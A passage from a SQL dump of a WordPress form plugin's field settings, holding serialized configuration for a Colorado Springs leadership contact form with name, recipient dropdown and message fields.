Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:6;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:8:\"selected\";s:1:\"0\";s:5:\"label\";s:5:\"Other\";s:5:\"value\";s:5:\"Other\";s:4:\"calc\";s:0:\"\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8521,133,'field_label','First Name','field_label','First Name'),(8522,133,'field_key','textbox_268','field_key','textbox_268'),(8523,133,'default','','default',''),(8524,133,'container_class','one-third first','container_class','one-third first'),(8525,133,'manual_key','','manual_key',''),(8526,133,'custom_mask','','custom_mask',''),(8527,133,'custom_name_attribute','','custom_name_attribute',''),(3922,125,'key','listselect_37','key','listselect_37'),(3923,125,'container_class','','container_class',''),(3924,125,'parent_id','12','parent_id','12'),(3925,126,'objectType','Field','objectType','Field'),(3926,126,'objectDomain','fields','objectDomain','fields'),(3927,126,'editActive','','editActive',''),(3928,126,'order','7','order','7'),(3929,126,'type','hr','type','hr'),(3930,126,'label','hr','label','hr'),(3931,126,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(3932,126,'show_desc','0','show_desc','0'),(3933,126,'desc_pos','none','desc_pos','none'),(3934,126,'desc_text','','desc_text',''),(3935,126,'element_class','','element_class',''),(3936,126,'key','hr_38','key','hr_38'),(3937,126,'container_class','','container_class',''),(3938,126,'parent_id','12','parent_id','12'),(3939,127,'objectType','Field','objectType','Field'),(3940,127,'objectDomain','fields','objectDomain','fields'),(3941,127,'editActive','','editActive',''),(3942,127,'order','8','order','8'),(3943,127,'type','html','type','html'),(3944,127,'label','Colorado Springs Leadership Positions','label','Colorado Springs Leadership Positions'),(3945,127,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(3946,127,'default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Leadership Positions</span></span></span></strong></span></h3>','default_value','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Leadership Positions</span></span></span></strong></span></h3>'),(3947,127,'desc_el','div','desc_el','div'),(3948,127,'show_desc','0','show_desc','0'),(3949,127,'desc_pos','none','desc_pos','none'),(3950,127,'desc_text','','desc_text',''),(3951,127,'element_class','','element_class',''),(3952,127,'default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Leadership Positions</span></span></span></strong></span></h3>','default','<h3><span style=\"color: #23507d;\"><strong><span class=\"bfLegend-l\"><span class=\"bfLegend-r\"><span class=\"bfLegend-m\">Colorado Springs Leadership Positions</span></span></span></strong></span></h3>'),(3953,127,'key','html_39','key','html_39'),(3954,127,'container_class','','container_class',''),(3955,127,'parent_id','12','parent_id','12'),(3956,128,'objectType','Field','objectType','Field'),(3957,128,'objectDomain','fields','objectDomain','fields'),(3958,128,'editActive','','editActive',''),(3959,128,'order','9','order','9'),(3960,128,'type','listselect','type','listselect'),(3961,128,'label','Select the person you would like to email','label','Select the person you would like to email'),(3962,128,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(3963,128,'label_pos','above','label_pos','above'),(3964,128,'list_type','dropdown','list_type','dropdown'),(3965,128,'multi_size','5','multi_size','5'),(3966,128,'list_show_value','1','list_show_value','1'),(3967,128,'list','a:0:{}','list','a:0:{}'),(3968,128,'user_info_field_group','','user_info_field_group',''),(3969,128,'calc_auto_include','0','calc_auto_include','0'),(3970,128,'user_state','0','user_state','0'),(3971,128,'num_sort','0','num_sort','0'),(3972,128,'admin_label','','admin_label',''),(3973,128,'show_help','0','show_help','0'),(3974,128,'help_text','','help_text',''),(3975,128,'show_desc','0','show_desc','0'),(3976,128,'desc_pos','none','desc_pos','none'),(3977,128,'desc_text','','desc_text',''),(3978,128,'element_class','','element_class',''),(3979,128,'required','1','required','1'),(3980,128,'options','a:6:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"Local Director\";s:5:\"value\";s:14:\"Local Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:32:\"Administrative Services Director\";s:5:\"value\";s:32:\"Administrative Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:22:\"ECK Center Coordinator\";s:5:\"value\";s:22:\"ECK Center Coordinator\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:27:\"Spiritual Services Director\";s:5:\"value\";s:27:\"Spiritual Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Vahana Leader\";s:5:\"value\";s:13:\"Vahana Leader\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}','options','a:6:{i:0;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Please Select\";s:5:\"value\";s:13:\"Please Select\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:1;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:14:\"Local Director\";s:5:\"value\";s:14:\"Local Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:2;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:32:\"Administrative Services Director\";s:5:\"value\";s:32:\"Administrative Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:3;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:22:\"ECK Center Coordinator\";s:5:\"value\";s:22:\"ECK Center Coordinator\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:4;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:27:\"Spiritual Services Director\";s:5:\"value\";s:27:\"Spiritual Services Director\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}i:5;a:7:{s:6:\"errors\";a:0:{}s:11:\"max_options\";s:1:\"0\";s:5:\"label\";s:13:\"Vahana Leader\";s:5:\"value\";s:13:\"Vahana Leader\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";s:1:\"0\";s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}}}'),(8515,132,'editActive','','editActive',''),(8516,132,'field_label','Text','field_label','Text'),(8517,132,'field_key','html_267','field_key','html_267'),(8518,132,'container_class','','container_class',''),(8519,132,'drawerDisabled','','drawerDisabled',''),(8520,133,'editActive','','editActive',''),(3981,128,'key','listselect_40','key','listselect_40'),(3982,128,'container_class','','container_class',''),(3983,128,'parent_id','12','parent_id','12'),(3984,129,'objectType','Field','objectType','Field'),(3985,129,'objectDomain','fields','objectDomain','fields'),(3986,129,'editActive','','editActive',''),(3987,129,'order','10','order','10'),(3988,129,'type','textarea','type','textarea'),(3989,129,'label','Enter Your Message Here','label','Enter Your Message Here'),(3990,129,'input_limit_msg','character(s) left','input_limit_msg','character(s) left'),(3991,129,'label_pos','above','label_pos','above'),(3992,129,'default_value','','default_value',''),(3993,129,'textarea_rte','0','textarea_rte','0'),(3994,129,'textarea_media','0','textarea_media','0'),(3995,129,'disable_rte_mobile','0','disable_rte_mobile','0'),(3996,129,'input_limit','','input_limit',''),(3997,129,'input_limit_type','char','input_limit_type','char'),(3998,129,'calc_auto_include','0','calc_auto_include','0'),(3999,129,'num_sort','0','num_sort','0'),(4000,129,'admin_label','','admin_label',''),(4001,129,'show_help','0','show_help','0'),(4002,129,'help_text','','help_text',''),(4003,129,'show_desc','0','show_desc','0'),(4004,129,'desc_pos','none','desc_pos','none'),(4005,129,'desc_text','','desc_text',''),(4006,129,'element_class','','element_class',''),(4007,129,'required','1','required','1'),(4008,129,'default','','default',''),(4009,129,'key','textarea_41','key','textarea_41'),(4010,129,'placeholder','','placeholder',''),(4011,129,'container_class','','container_class',''),(4012,129,'manual_key','','manual_key',''),(4013,129,'parent_id','12','parent_id','12'),(17535,628,'editActive','','editActive',''),(17534,627,'drawerDisabled','','drawerDisabled',''),(17533,627,'key','html_1663800425943','key','html_1663800425943'),(17532,627,'element_class','','element_class',''),(17531,627,'container_class','','container_class',''),(17530,627,'default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> apply.','default','This site is protected by reCAPTCHA and the Google    <a href=\"https://policies.google.com/privacy\">Privacy Policy</a> and    <a href=\"https://policies.google.com/terms\">Terms of Service</a> 